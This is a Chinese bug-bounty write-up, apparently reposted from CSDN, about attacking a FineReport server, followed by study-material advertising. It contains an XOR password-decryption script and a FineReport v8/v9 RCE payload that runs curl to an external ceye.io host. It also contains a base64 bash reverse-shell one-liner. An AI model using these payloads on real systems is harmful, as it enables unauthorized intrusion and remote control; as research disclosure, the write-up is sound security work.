【网络安全】一次SRC挖掘经历

发布时间:2023年12月25日

本文仅供网络安全学习研究,违F绕路

资产发现

首先是信息收集子域名,谷歌语句直接site:xxx.com -www,一个登录口网站吸引了我的注意力。

我点击电信、网通、自动的时候,发现域名跳转到了真实IP

这样,就可以对真实IP进行端口扫描->目录扫描一把梭了,发现在8080端口发现ReportServe部署页面。

接着就对帆软的历史漏洞进行测试了。

任意文件读取获取密码解密登录后台

view-source:xxx.xxx.xxx.xxx:8080/ReportServe…

刚开始的时候是空白页,查看源代码才发现信息

可以看到用户为posun,密码需要解密一下

解密脚本:

cipher = '___0022007c0039003b005100e3' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
    c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
    c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
    Password = Password + chr(c2)
print (Password)

解密得到123456,问题是拿到哪里登录呢,突然想到刚才有个数据决策系统,拿去登录刚才的数据决策系统.

成功进入后台,然而高兴的太早了,因为该站长注册码到期了,且没有什么敏感信息。SRC也是反馈危害性不大,不能收,没办法,只能另寻途径了。

【相关技术学习文档】

帆软报表FineRePort未授权远程命令执行漏洞

影响版本:

    • 帆软报表 FineRePortv8.0
    • 帆软报表 FineRePortv9.0
xxx.com/WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin

这个接口 打开 点查询 burp拦截数据包 替换post的内容

__parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR "com.fr.chart.phantom.system.SystemServiceUtils.exeCmd";CALL RUMCMD('curl http://uki7s7.ceye.io');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}

便操作了一下,前提是需要得知用户名

漏洞地址:xxx.xxx.xxx.xxx:8080/ReportServe…

点击查询抓包改包,这里先是简单的ceye回显,改包后一直forward

可以看到,我的ceye收到回显,说明该漏洞是存在的,为了证明危害性,我后面继续了反弹shell操作

bash -c {echo,base64编码}|{base64,-d}|{bash,-i}

VPS监听7777端口,如图下 反弹shell成功

备注:刚开始对面审核SRC愣是死活复现不出来,手把手教学了,这里有几个问题注意下,查询不能太频繁 容易并发数满,需要等一段时间,我后面第二天并发数才清空.

总结

  • 多观察细节,比如刚刚的真实IP就冒出来了
  • 遇到危害性不大漏洞不要慌,留着还能组合其它的漏洞.

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码免费领取(如遇扫码问题,可以在评论区留言领取哦)~

在这里插入图片描述

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码免费领取(如遇扫码问题,可以在评论区留言领取哦)~

在这里插入图片描述

文章来源:https://blog.csdn.net/2301_79455190/article/details/135195202
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。